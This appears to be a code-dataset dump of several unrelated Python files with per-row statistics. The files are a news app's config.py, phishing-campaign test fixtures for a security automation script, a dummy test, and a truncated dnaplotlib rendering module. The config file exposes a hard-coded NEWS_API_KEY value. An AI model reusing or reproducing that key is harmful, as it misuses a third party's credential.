| 0.017274
| 0
| 0.055662
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f6514a00351bafe72d2ddee36994708bbb7f30ad
| 51
|
py
|
Python
|
instance/config.py
|
wanjikuciku/News-highlight
|
d7e0939488aa15bea713e6c30a18bafd5be3e01a
|
[
"Unlicense"
] | null | null | null |
instance/config.py
|
wanjikuciku/News-highlight
|
d7e0939488aa15bea713e6c30a18bafd5be3e01a
|
[
"Unlicense"
] | null | null | null |
instance/config.py
|
wanjikuciku/News-highlight
|
d7e0939488aa15bea713e6c30a18bafd5be3e01a
|
[
"Unlicense"
] | null | null | null |
NEWS_API_KEY = '<8d5f514bd83b414e9cc06c4df0ae8727>'
| 51
| 51
| 0.862745
| 4
| 51
| 10.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.387755
| 0.039216
| 51
| 1
| 51
| 51
| 0.469388
| 0
| 0
| 0
| 0
| 0
| 0.653846
| 0.653846
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c8c791e6d197a6296f7914ad78462a1e5f0326b
| 10,145
|
py
|
Python
|
Packs/Campaign/Scripts/SetPhishingCampaignDetails/test_data/campaign_data.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799
|
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Campaign/Scripts/SetPhishingCampaignDetails/test_data/campaign_data.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317
|
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Campaign/Scripts/SetPhishingCampaignDetails/test_data/campaign_data.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297
|
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
CAMPAIGN_INCIDENT_CONTEXT = {
"EmailCampaign": {
"firstIncidentDate": "2021-11-21T14:00:07.425185+00:00",
"incidents": [
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "1",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:00:07.119800133Z",
"recipients": [
"victim-test6@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 1,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example2.com",
"id": "2",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:59:01.690685509Z",
"recipients": [
"victim-test1@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.9999999999999999,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "3",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:00:07.425185504Z",
"recipients": [
"victim-test7@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 3,
"similarity": 1,
"status": 1
}
],
"indicators": [
{
"id": "1263",
"value": "http://www.example.com"
}
],
"involvedIncidentsCount": 3,
"isCampaignFound": True
},
"ExistingCampaignID": [
"809"
]
}
NEW_INCIDENT_CONTEXT = {
"EmailCampaign": {
"firstIncidentDate": "2021-11-21T14:00:07.425185+00:00",
"incidents": [
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "5",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:01:07.119800133Z",
"recipients": [
"victim-test6@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 1,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "1",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:00:07.119800133Z",
"recipients": [
"victim-test6@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.99,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example2.com",
"id": "2",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:59:01.690685509Z",
"recipients": [
"victim-test1@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.98,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "3",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:00:07.425185504Z",
"recipients": [
"victim-test7@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 3,
"similarity": 0.85,
"status": 1
}
],
"indicators": [
{
"id": "1263",
"value": "http://www.example.com"
}
],
"involvedIncidentsCount": 4,
"isCampaignFound": True
},
"ExistingCampaignID": [
"809"
]
}
NEW_INCIDENT_2_CONTEXT = {
"EmailCampaign": {
"firstIncidentDate": "2021-11-21T14:00:07.425185+00:00",
"incidents": [
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "4",
"name": "Verify your example account 798",
"occurred": "2021-11-21T16:00:00.119800133Z",
"recipients": [
"victim-test6@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 1,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "1",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:00:07.119800133Z",
"recipients": [
"victim-test6@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.98,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example2.com",
"id": "2",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:59:01.690685509Z",
"recipients": [
"victim-test1@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.97,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "3",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:00:07.425185504Z",
"recipients": [
"victim-test7@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 3,
"similarity": 0.86,
"status": 1
}
],
"indicators": [
{
"id": "1263",
"value": "http://www.example.com"
}
],
"involvedIncidentsCount": 4,
"isCampaignFound": True
},
"ExistingCampaignID": [
"809"
]
}
OLD_INCIDENT_CONTEXT = {
"EmailCampaign": {
"firstIncidentDate": "2021-11-21T14:00:07.425185+00:00",
"incidents": [
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "1",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:00:07.119800133Z",
"recipients": [
"victim-test6@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 1,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example2.com",
"id": "2",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:59:01.690685509Z",
"recipients": [
"victim-test1@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.9999999999999999,
"status": 1
},
{
"emailfrom": "examplesupport@example2.com",
"emailfromdomain": "example.com",
"id": "3",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:00:07.425185504Z",
"recipients": [
"victim-test7@demistodev.onmicrosoft.com"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 3,
"similarity": 1,
"status": 1
}
],
"indicators": [
{
"id": "1263",
"value": "http://www.example.com"
}
],
"involvedIncidentsCount": 3,
"isCampaignFound": True
},
"ExistingCampaignID": [
"809"
]
}
NEW_EMPTY_CAMPAIGN = {}
INCIDENTS_BY_ID = {'0': CAMPAIGN_INCIDENT_CONTEXT, '1': NEW_EMPTY_CAMPAIGN, '3': OLD_INCIDENT_CONTEXT,
'4': NEW_INCIDENT_2_CONTEXT, '5': NEW_INCIDENT_CONTEXT}
| 33.592715
| 102
| 0.407097
| 666
| 10,145
| 6.165165
| 0.103604
| 0.09547
| 0.105699
| 0.115928
| 0.96152
| 0.96152
| 0.958841
| 0.958841
| 0.958841
| 0.947881
| 0
| 0.115886
| 0.463282
| 10,145
| 301
| 103
| 33.704319
| 0.6382
| 0
| 0
| 0.789298
| 0
| 0
| 0.402661
| 0.15377
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9cac519b9b19b3203af1c4ad2219f1501a79a95f
| 165
|
py
|
Python
|
tests/test_base.py
|
AGaliciaMartinez/qutip-tensorflow
|
1768387250271d6083626c10b83ea86bbb973ebf
|
[
"BSD-3-Clause"
] | 2
|
2021-05-24T23:19:21.000Z
|
2021-05-25T07:45:13.000Z
|
tests/test_base.py
|
AGaliciaMartinez/qutip-tensorflow
|
1768387250271d6083626c10b83ea86bbb973ebf
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_base.py
|
AGaliciaMartinez/qutip-tensorflow
|
1768387250271d6083626c10b83ea86bbb973ebf
|
[
"BSD-3-Clause"
] | null | null | null |
# This is a dummy test file; delete it once the package actually has tests.
def test_import():
import qutip_tensorflow
assert qutip_tensorflow.__version__
| 23.571429
| 75
| 0.769697
| 24
| 165
| 5
| 0.833333
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.187879
| 165
| 6
| 76
| 27.5
| 0.895522
| 0.442424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.666667
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1ad2b91aa923995a47386d91a6b7325029404326
| 124,658
|
py
|
Python
|
dnaplotlib/dnaplotlib.py
|
scaralbi/dnaplotlib
|
a1fdd12ac3f3df1b16a0351402b8fe4f29b388d9
|
[
"MIT"
] | 1
|
2020-09-18T17:38:53.000Z
|
2020-09-18T17:38:53.000Z
|
dnaplotlib/dnaplotlib/dnaplotlib.py
|
CIDARLAB/pidgeon
|
875f3883aeac03b1c38bc592f262e18a390f482b
|
[
"BSD-3-Clause"
] | 2
|
2020-05-19T21:04:24.000Z
|
2020-05-20T23:56:07.000Z
|
dnaplotlib/dnaplotlib/dnaplotlib.py
|
CIDARLAB/pidgeon
|
875f3883aeac03b1c38bc592f262e18a390f482b
|
[
"BSD-3-Clause"
] | 3
|
2020-05-19T16:23:09.000Z
|
2020-08-04T22:28:21.000Z
|
#!/usr/bin/env python
"""
DNAplotlib
==========
This module is designed to allow for highly customisable visualisation of DNA
fragments. Diagrams can be in the form of conceptual SBOL compliant icons or
make use of icons whose width is scaled to allow for easier comparison of part
locations to trace information, such as for corresponding RNA-seq read depth
data. All plotting is performed using matplotlib and to an axis object. This
enables the export of publication quality, vector-based figures. Furthermore,
all standard renderers can be replaced with user defined versions to allow
for full customisation of the plot.
To make use of this module it is necessary to create the rendering object
after importing the module:
> import dnaplotlib as dpl
> dr = dpl.DNARenderer()
This object performs all rendering using the renderDNA() method. To describe
what should be plotted, dnaplotlib requires the DNA design in a specific
format. For standard SBOL diagrams a design is a list of dictionaries where
each dictionary relates to a specific part and as a minimum contains the
keys:
- name: A name that can be potentially used in regulation.
- type: The type of part (decides which renderer to use).
- fwd: Boolean defining if the part is in a forward orientation.
- start: Start position (optional)
- end: End position (optional)
Once this list is defined and an axis object is created the design can be
draw using standard renders and to a user created matplotlib axes by running:
> reg_renderers = dr.std_reg_renderers()
> part_renderers = dr.SBOL_part_renderers()
> regs = None
> design = ... Design is created here ...
> ax = ... matplotlib axes created here ...
> start, end = dr.renderDNA(ax, design, part_renderers, regs, reg_renderers)
The function returns the start and end point of the design which can then
be used for resizing the axes and figure. For more advanced use cases we
advise looking at the gallery distributed with this module.
"""
import math
import csv
from operator import itemgetter
# Set the backend to use (important for headless servers)
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon, Ellipse, Wedge, Circle, PathPatch
from matplotlib.path import Path
from matplotlib.lines import Line2D
from matplotlib.patheffects import Stroke
import matplotlib.patches as patches
__author__ = 'Thomas E. Gorochowski <tom@chofski.co.uk>\n\
Bryan Der <bder@mit.edu>\n\
Emerson Glassey <eglassey@mit.edu>'
__license__ = 'MIT'
__version__ = '1.0'
###############################################################################
# SBOL Compliant Icon Renderers
###############################################################################
def write_label (ax, label_text, x_pos, opts=None):
""" Renders labels on parts.
"""
zorder_add = 0.0
y_offset = 0.0
label_style = 'normal'
label_size = 7
label_y_offset = 0
label_x_offset = 0
label_color = (0,0,0)
label_rotation = 0
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'y_offset' in list(opts.keys()):
y_offset = opts['y_offset']
if 'label_style' in list(opts.keys()):
label_style = opts['label_style']
if 'label_size' in list(opts.keys()):
label_size = opts['label_size']
if 'label_y_offset' in list(opts.keys()):
label_y_offset = opts['label_y_offset']
if 'label_x_offset' in list(opts.keys()):
label_x_offset = opts['label_x_offset']
if 'label_color' in list(opts.keys()):
label_color = opts['label_color']
if 'label_rotation' in list(opts.keys()):
label_rotation = opts['label_rotation']
ax.text(x_pos+label_x_offset, label_y_offset+y_offset, label_text, horizontalalignment='center',
verticalalignment='center', fontsize=label_size, fontstyle=label_style,
color=label_color, rotation=label_rotation, zorder=30+zorder_add)
def sbol_promoter (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL promoter renderer.
"""
# Default options
zorder_add = 0.0
color = (0.0,0.0,0.0)
start_pad = 2.0
end_pad = 2.0
y_extent = 10
x_extent = 10
arrowhead_height = 2
arrowhead_length = 4
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'arrowhead_height' in list(opts.keys()):
arrowhead_height = opts['arrowhead_height']
if 'arrowhead_length' in list(opts.keys()):
arrowhead_length = opts['arrowhead_length']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
dir_fac = 1.0
final_end = end
final_start = prev_end
if start > end:
dir_fac = -1.0
start = prev_end+end_pad+x_extent
end = prev_end+end_pad
final_end = start+start_pad
else:
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
# Draw the promoter symbol
l1 = Line2D([start,start],[0,dir_fac*y_extent], linewidth=linewidth,
color=color, zorder=9+zorder_add)
l2 = Line2D([start,start+dir_fac*x_extent-dir_fac*(arrowhead_length*0.5)],
[dir_fac*y_extent,dir_fac*y_extent], linewidth=linewidth,
color=color, zorder=10+zorder_add)
ax.add_line(l1)
ax.add_line(l2)
p1 = Polygon([(start+dir_fac*x_extent-dir_fac*arrowhead_length,
dir_fac*y_extent+(arrowhead_height)),
(start+dir_fac*x_extent, dir_fac*y_extent),
(start+dir_fac*x_extent-dir_fac*arrowhead_length,
dir_fac*y_extent-(arrowhead_height))],
facecolor=color, edgecolor=color, linewidth=linewidth, zorder=1+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0
ax.add_patch(p1)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_cds (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL coding sequence renderer.
"""
# Default options
zorder_add = 0.0
color = (0.7,0.7,0.7)
hatch = ''
start_pad = 1.0
end_pad = 1.0
y_extent = 5
x_extent = 30
arrowhead_height = 4
arrowhead_length = 8
edgecolor = (0,0,0)
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'hatch' in list(opts.keys()):
hatch = opts['hatch']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'arrowhead_height' in list(opts.keys()):
arrowhead_height = opts['arrowhead_height']
if 'arrowhead_length' in list(opts.keys()):
arrowhead_length = opts['arrowhead_length']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
if 'edge_color' in list(opts.keys()):
edgecolor = opts['edge_color']
# Check direction add start padding
dir_fac = 1.0
final_end = end
final_start = prev_end
if start > end:
dir_fac = -1.0
start = prev_end+end_pad+x_extent
end = prev_end+end_pad
final_end = start+start_pad
else:
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
# Draw the CDS symbol
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(end-dir_fac*arrowhead_length, -y_extent),
(end-dir_fac*arrowhead_length, -y_extent-arrowhead_height),
(end, 0),
(end-dir_fac*arrowhead_length, y_extent+arrowhead_height),
(end-dir_fac*arrowhead_length, y_extent)],
edgecolor=edgecolor, facecolor=color, linewidth=linewidth,
hatch=hatch, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # This is a work around for matplotlib < 1.4.0
ax.add_patch(p1)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_terminator (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL terminator renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
y_extent = 10.0
x_extent = 8.0
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
dir_fac = 1.0
final_end = end
final_start = prev_end
if start > end:
dir_fac = -1.0
start = prev_end+end_pad+x_extent
end = prev_end+end_pad
final_end = start+start_pad
else:
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
# Draw the terminator symbol
l1 = Line2D([start+dir_fac*(x_extent/2.0),start+dir_fac*(x_extent/2.0)],[0,dir_fac*y_extent], linewidth=linewidth,
color=color, zorder=8+zorder_add)
l2 = Line2D([start,start+(dir_fac*x_extent)],[dir_fac*y_extent,dir_fac*y_extent],
linewidth=linewidth, color=color, zorder=9+zorder_add)
ax.add_line(l1)
ax.add_line(l2)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_rbs (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL ribosome binding site renderer.
"""
# Default options
zorder_add = 0.0
color = (0.7,0.7,0.7)
start_pad = 2.0
end_pad = 2.0
x_extent = 10.0
edgecolor = (0,0,0)
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
if 'edge_color' in list(opts.keys()):
edgecolor = opts['edge_color']
# Check direction add start padding
dir_fac = 1.0
final_end = end
final_start = prev_end
rbs_center = (0,0)
if start > end:
start = prev_end+end_pad+x_extent
end = prev_end+end_pad
final_end = start+start_pad
rbs_center = (end+((start-end)/2.0),0)
w1 = Wedge(rbs_center, x_extent/2.0, 180, 360, linewidth=linewidth,
facecolor=color, edgecolor=edgecolor, zorder=8+zorder_add)
ax.add_patch(w1)
else:
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
rbs_center = (start+((end-start)/2.0),0)
w1 = Wedge(rbs_center, x_extent/2.0, 0, 180, linewidth=linewidth,
facecolor=color, edgecolor=edgecolor, zorder=8+zorder_add)
ax.add_patch(w1)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_ribozyme (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL ribozyme renderer.
"""
return stick_figure(ax,type,num,start,end,prev_end,scale,linewidth,opts)
def stick_figure (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" General function for drawing stick based parts (e.g., ribozyme and protease sites).
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
x_extent = 5.0
y_extent = 10.0
linestyle = '-'
linetype = "";
shapetype = "";
if(type == "Ribozyme"):
linetype = 'dash'
headgroup = 'O'
elif(type == "Protease"):
linetype = 'dash'
headgroup = 'X'
elif(type == "ProteinStability"):
linetype = 'solid'
headgroup = 'O'
elif(type == "Ribonuclease"):
linetype = 'solid'
headgroup = 'X'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
final_end = end
final_start = prev_end
if start > end:
start = prev_end+end_pad+x_extent
end = prev_end+end_pad
final_end = start+start_pad
rbs_center = (end+((start-end)/2.0),-y_extent)
c1 = Circle(rbs_center, x_extent/2.0, linewidth=linewidth, edgecolor=color,
facecolor=(1,1,1), zorder=8+zorder_add)
x1 = Line2D([start,end],[-y_extent*1.25,-y_extent/1.5],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle='-')
x2 = Line2D([start,end],[-y_extent/1.5,-y_extent*1.25],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle='-')
dash1 = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[0,-y_extent/4],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
dash2 = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[-y_extent/2,-y_extent+(x_extent/2.0)],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
solidO = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[0,-y_extent+(x_extent/2.0)],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
solidX = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[0,-y_extent],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
if(headgroup == "O" and linetype == "dash"):
ax.add_patch(c1)
ax.add_line(dash1)
ax.add_line(dash2)
elif(headgroup == "X" and linetype == "dash"):
ax.add_line(x1)
ax.add_line(x2)
ax.add_line(dash1)
ax.add_line(dash2)
elif(headgroup == "O" and linetype == "solid"):
ax.add_patch(c1)
ax.add_line(solidO)
elif(headgroup == "X" and linetype == "solid"):
ax.add_line(x1)
ax.add_line(x2)
ax.add_line(solidX)
else:
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
rbs_center = (start+((end-start)/2.0),y_extent)
c1 = Circle(rbs_center, x_extent/2.0, linewidth=linewidth, edgecolor=color,
facecolor=(1,1,1), zorder=8+zorder_add)
x1 = Line2D([start,end],[y_extent*1.25,y_extent/1.5],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle='-')
x2 = Line2D([start,end],[y_extent/1.5,y_extent*1.25],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle='-')
dash1 = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[0,y_extent/4],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
dash2 = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[y_extent/2,y_extent-(x_extent/2.0)],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
solidO = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[0,y_extent-(x_extent/2.0)],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
solidX = Line2D([end+((start-end)/2.0),end+((start-end)/2.0)],[0,y_extent],
linewidth=linewidth, color=color, zorder=8+zorder_add, linestyle=linestyle)
if(headgroup == 'O' and linetype == 'dash'):
ax.add_patch(c1)
ax.add_line(dash1)
ax.add_line(dash2)
elif(headgroup == "X" and linetype == "dash"):
ax.add_line(x1)
ax.add_line(x2)
ax.add_line(dash1)
ax.add_line(dash2)
elif(headgroup == "O" and linetype == "solid"):
ax.add_patch(c1)
ax.add_line(solidO)
elif(headgroup == "X" and linetype == "solid"):
ax.add_line(x1)
ax.add_line(x2)
ax.add_line(solidX)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_stem_top (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" General function for drawing stem-top parts (e.g., ribozyme and protease sites).
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
x_extent = 5.0
y_extent = 10.0
linestyle = '-'
shapetype = "";
if type in ["DNACleavageSite"]:
stemtype = 'straight'
toptype = 'X'
elif type in ["RNACleavageSite", "Ribonuclease"]:
stemtype = 'wavy'
toptype = 'X'
elif type in ["ProteinCleavageSite", "Protease"]:
stemtype = 'loopy'
toptype = 'X'
elif type in ["DNALocation"]:
stemtype = 'straight'
toptype = 'O'
elif type in ["RNALocation"]:
stemtype = 'wavy'
toptype = 'O'
elif type in ["ProteinLocation"]:
stemtype = 'loopy'
toptype = 'O'
elif type in ["DNAStability"]:
stemtype = 'straight'
toptype = 'P'
elif type in ["RNAStability"]:
stemtype = 'wavy'
toptype = 'P'
elif type in ["ProteinStability"]:
stemtype = 'loopy'
toptype = 'P'
elif type in ["StemTop"]:
stemtype = opts['stem']
toptype = opts['top']
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Check direction add start padding
final_end = end
final_start = prev_end
